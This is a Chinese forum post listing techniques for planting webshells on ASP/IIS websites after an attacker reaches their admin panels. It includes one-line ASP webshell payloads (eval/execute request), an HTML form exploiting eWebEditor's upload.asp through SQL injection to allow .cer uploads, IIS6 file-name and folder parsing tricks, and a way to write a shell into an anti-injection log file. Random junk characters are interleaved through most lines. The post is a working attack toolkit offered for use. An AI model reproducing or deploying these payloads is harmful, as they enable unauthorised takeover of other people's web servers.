|
 
- 帖子
- 228
- 积分
- 645
- 威望
- 810
- 金钱
- 1192
- 在线时间
- 63 小时
|
1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
# M2 n- x) k- _1 ?6 ~0 M. C1 `& a9 V) \5 h5 w* b& H
2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试<%eval request("value")%>来突破,例如config.asp
! ]* J) C# t! N3 y; V$ `
9 {% r- s* B# i& m. h p% J3.上传漏洞:
" p5 [8 J( [% M0 @3 h, v) T' B4 ]" z& Q) V# Q- A
动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00
5 b5 p% T2 r7 `! X6 O/ Q' ^! x' f
8 l( \' w2 R* F( F# N$ ]% z逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件
: A, ~+ q8 u5 H) e: V
+ S# p9 d3 h4 h* j雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp) f( a# G* ~6 C& k* g K
然后在上传文件里面填要传的图片格式的ASP木马- m1 g0 R. {1 D- I* s
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp
" y% p1 R- h# z6 w1 d7 @8 r% J4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
( e* Q5 t# J: a2 E( t) {$ M6 K. [' }# ^$ }- H
<html>
& j" |) W1 J B$ b8 Z& @<head> D0 e. S3 L8 W D) H
<title>ewebeditor upload.asp上传利用</title>' W0 I- ?$ J9 s2 u: |- ^. P6 x
</head>/ \2 u7 q9 t' q. Q
<body>
/ W! d% t0 I! x0 B; A, w5 C8 {2 M; z: S( A<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">0 u+ Y6 A5 U$ m! q& a; c
<input type=file name=uploadfile size=100><br><br>
" s: C. K+ h0 q: A5 H<input type=submit value=Fuck>
2 f- |8 _8 d) e" [3 g \</form>, R2 `1 w B( b( @# w( Y
</body>+ t L% q' G/ y' Q) t h! W8 e
</form>
4 A# w/ X4 w$ M) Y6 x1 N* k</html>" i3 w+ }# g7 x* p& Q5 \
: g7 n! B! ~% E3 V
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问
9 f- x! s9 ^3 T$ A4 g8 b5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp, F' J i, C! {+ ~+ t" P4 K
6 D: `9 [/ _3 }( M |4 ]# t2 z
利用windows2003解析。建立zjq.asp的文件夹
1 O6 w/ p4 f. `* [9 s
( m8 Q5 e6 y4 `0 I. ^$ p' ~6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型
2 J- a7 z0 i) A
2 F" ]% R; K( N7.cuteeditor:类似ewebeditor
8 b5 ^4 _8 h6 _3 u, [' e7 ~
/ I5 `) O% S2 j3 Q7 h' c5 J8.htmleditor:同上4 B0 {0 Q9 d6 ^3 X2 _
6 x* s) d# N+ i( s- |
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破# i& Y( f0 w% Y+ t
$ I* G% Z. @# p8 \+ h<%execute request("value")%><%'<% loop <%:%>
0 d& M2 j) F. r) C1 P+ Q
0 h5 P' z- P9 x7 |% z! B7 e<%'<% loop <%:%><%execute request("value")%>
. ?7 s1 {6 s* i+ F- x+ Z5 F% t* k6 c1 F# |# a8 J/ F
<%execute request("value")'<% loop <%:%>& p5 g, s; I- o( r/ _. Z
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞
3 ~; ]; V% |( A7 v$ K) U) [
; t1 J8 J% I' b' Z& k) t4 L10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞 ~, J) m* {- X- [5 _1 V+ m
n7 U+ E& c# V' f; H7 y
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
V; w$ M$ Y; \0 M, @' x& g& Q5 z4 t
' d( ^5 K7 J- K. }- u( P解析漏洞得到webshell4 T2 j V( e. B! ]
8 _2 Q9 }: j5 E3 {12.mssql差异备份,日志备份,前提需知道web路径8 z' C$ L* Q" N5 ~5 z1 ]/ h" N
9 I# R' j9 D* p8 G5 U- b' l/ L13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell6 h9 s/ E; ^' B' e0 f
- _$ j$ b8 E* R8 E1 G14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell
) F4 a6 P" g8 R5 r" }, Z
q- m. K" }# e- ]( K2 a15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
: y4 C' t! Q" r5 t# b. J& U& O, [" X4 P
以上只是本人的一些拙见,并不完善,以后想到了再继续添加
# [" b% A) s- a不是我原创。我的朋友,飞鸟游鱼原创的 |
-
2
评分人数
-
|